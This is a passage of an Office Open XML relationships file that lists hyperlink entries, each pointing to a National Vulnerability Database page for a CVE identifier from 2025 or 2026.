TargetMode="External" Id="rId5771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18540" TargetMode="External" Id="rId5772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48082" TargetMode="External" Id="rId5773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54713" TargetMode="External" Id="rId5774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55785" TargetMode="External" Id="rId5775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58239" TargetMode="External" Id="rId5776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66774" TargetMode="External" Id="rId5777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71849" TargetMode="External" Id="rId5778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73425" TargetMode="External" Id="rId5779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78124" TargetMode="External" Id="rId5780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78127" TargetMode="External" Id="rId5781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78131" TargetMode="External" Id="rId5782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79690" TargetMode="External" Id="rId5783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79729" TargetMode="External" Id="rId5784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79732" TargetMode="External" Id="rId5785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79736" TargetMode="External" Id="rId5786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81168" TargetMode="External" Id="rId5787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81348" TargetMode="External" Id="rId5788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84307" TargetMode="External" Id="rId5789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84367" TargetMode="External" Id="rId5790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84368" TargetMode="External" Id="rId5791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84947" TargetMode="External" Id="rId5792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85008" TargetMode="External" Id="rId5793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86486" TargetMode="External" Id="rId5794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88013" TargetMode="External" Id="rId5795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89160" TargetMode="External" Id="rId5796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15694" TargetMode="External" Id="rId5797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15695" TargetMode="External" Id="rId5798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-52651" TargetMode="External" Id="rId5799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-52652" TargetMode="External" Id="rId5800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-52657" TargetMode="External" Id="rId5801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33333" TargetMode="External" Id="rId5802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45126" TargetMode="External" Id="rId5803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45127" TargetMode="External" Id="rId5804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45128" TargetMode="External" Id="rId5805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46460" TargetMode="External" Id="rId5806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49895" TargetMode="External" Id="rId5807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61909" TargetMode="External" Id="rId5808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61910" TargetMode="External" Id="rId5809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69904" TargetMode="External" Id="rId5810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75726" TargetMode="External" Id="rId5811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76816" TargetMode="External" Id="rId5812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76960" TargetMode="External" Id="rId5813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76961" TargetMode="External" Id="rId5814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77351" TargetMode="External" Id="rId5815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77508" TargetMode="External" Id="rId5816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77573" TargetMode="External" Id="rId5817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81846" TargetMode="External" Id="rId5818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86491" TargetMode="External" Id="rId5819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89151" TargetMode="External" Id="rId5820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79693" TargetMode="External" Id="rId5821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79942" TargetMode="External" Id="rId5822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79944" TargetMode="External" Id="rId5823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87456" TargetMode="External" Id="rId5824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87576" TargetMode="External" Id="rId5825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87647" TargetMode="External" Id="rId5826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0054" TargetMode="External" Id="rId5827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17483" TargetMode="External" Id="rId5828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28582" TargetMode="External" Id="rId5829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28622" TargetMode="External" Id="rId5830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28623" TargetMode="External" Id="rId5831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28630" TargetMode="External" Id="rId5832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28638" TargetMode="External" Id="rId5833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28660" TargetMode="External" Id="rId5834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28671" TargetMode="External" Id="rId5835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38093" TargetMode="External" Id="rId5836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45519" TargetMode="External" Id="rId5837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45521" TargetMode="External" Id="rId5838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45525" TargetMode="External" Id="rId5839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45761" TargetMode="External" Id="rId5840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54548" TargetMode="External" Id="rId5841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55290" TargetMode="External" Id="rId5842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59326" TargetMode="External" Id="rId5843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64652" TargetMode="External" Id="rId5844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73071" TargetMode="External" Id="rId5845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79727" TargetMode="External" Id="rId5846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79966" TargetMode="External" Id="rId5847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80169" TargetMode="External" Id="rId5848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80175" TargetMode="External" Id="rId5849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86485" TargetMode="External" Id="rId5850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86503" TargetMode="External" Id="rId5851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86505" TargetMode="External" Id="rId5852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86564" TargetMode="External" Id="rId5853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28652" TargetMode="External" Id="rId5854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48707" TargetMode="External" Id="rId5855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49456" TargetMode="External" Id="rId5856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54787" TargetMode="External" Id="rId5857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55825" TargetMode="External" Id="rId5858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57232" TargetMode="External" Id="rId5859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61908" TargetMode="External" Id="rId5860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70483" TargetMode="External" Id="rId5861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70600" TargetMode="External" Id="rId5862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84066" TargetMode="External" Id="rId5863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84389" TargetMode="External" Id="rId5864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85052" TargetMode="External" Id="rId5865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86487" TargetMode="External" Id="rId5866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87434" TargetMode="External" Id="rId5867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87442" TargetMode="External" Id="rId5868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87451" TargetMode="External" Id="rId5869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87452" TargetMode="External" Id="rId5870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87485" TargetMode="External" Id="rId5871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87498" TargetMode="External" Id="rId5872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87517" TargetMode="External" Id="rId5873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87521" TargetMode="External" Id="rId5874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87531" TargetMode="External" Id="rId5875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87539" TargetMode="External" Id="rId5876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87611" TargetMode="External" Id="rId5877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87614" TargetMode="External" Id="rId5878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87652" TargetMode="External" Id="rId5879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87657" TargetMode="External" Id="rId5880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49262" TargetMode="External" Id="rId5881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87876" TargetMode="External" Id="rId5882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-69873" TargetMode="External" Id="rId5883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16517" TargetMode="External" Id="rId5884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42578" TargetMode="External" Id="rId5885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85639" TargetMode="External" Id="rId5886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85704" TargetMode="External" Id="rId5887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86137" TargetMode="External" Id="rId5888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86141" TargetMode="External" Id="rId5889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86231" TargetMode="External" Id="rId5890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86670" TargetMode="External" Id="rId5891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89156" TargetMode="External" Id="rId5892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89162" TargetMode="External" Id="rId5893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86501" TargetMode="External" Id="rId5894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15693" TargetMode="External" Id="rId5895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48074" TargetMode="External" Id="rId5896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70430" TargetMode="External" Id="rId5897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78150" TargetMode="External" Id="rId5898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84392" TargetMode="External" Id="rId5899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84745" TargetMode="External" Id="rId5900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84926" TargetMode="External" Id="rId5901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84927" TargetMode="External" Id="rId5902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86779" TargetMode="External" Id="rId5903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87525" TargetMode="External" Id="rId5904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55824" TargetMode="External" Id="rId5905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18743" TargetMode="External" Id="rId5906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45197" TargetMode="External" Id="rId5907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0303" TargetMode="External" Id="rId5908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15418" TargetMode="External" Id="rId5909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71438" TargetMode="External" Id="rId5910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80239" TargetMode="External" Id="rId5911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82874" TargetMode="External" Id="rId5912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89145" TargetMode="External" Id="rId5913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10031" TargetMode="External" Id="rId5914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16434" TargetMode="External" Id="rId5915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46712" TargetMode="External" Id="rId5916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61712" TargetMode="External" Id="rId5917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63641" TargetMode="External" Id="rId5918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65655" TargetMode="External" Id="rId5919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66000" TargetMode="External" Id="rId5920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68554" TargetMode="External" Id="rId5921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73087" TargetMode="External" Id="rId5922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73491" TargetMode="External" Id="rId5923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73492" TargetMode="External" Id="rId5924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74797" TargetMode="External" Id="rId5925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75850" TargetMode="External" Id="rId5926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81738" TargetMode="External" Id="rId5927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82060" TargetMode="External" Id="rId5928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82584" TargetMode="External" Id="rId5929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82710" TargetMode="External" Id="rId5930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86198" TargetMode="External" Id="rId5931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86418" TargetMode="External" Id="rId5932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86441" TargetMode="External" Id="rId5933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86739" TargetMode="External" Id="rId5934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58234" TargetMode="External" Id="rId5935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 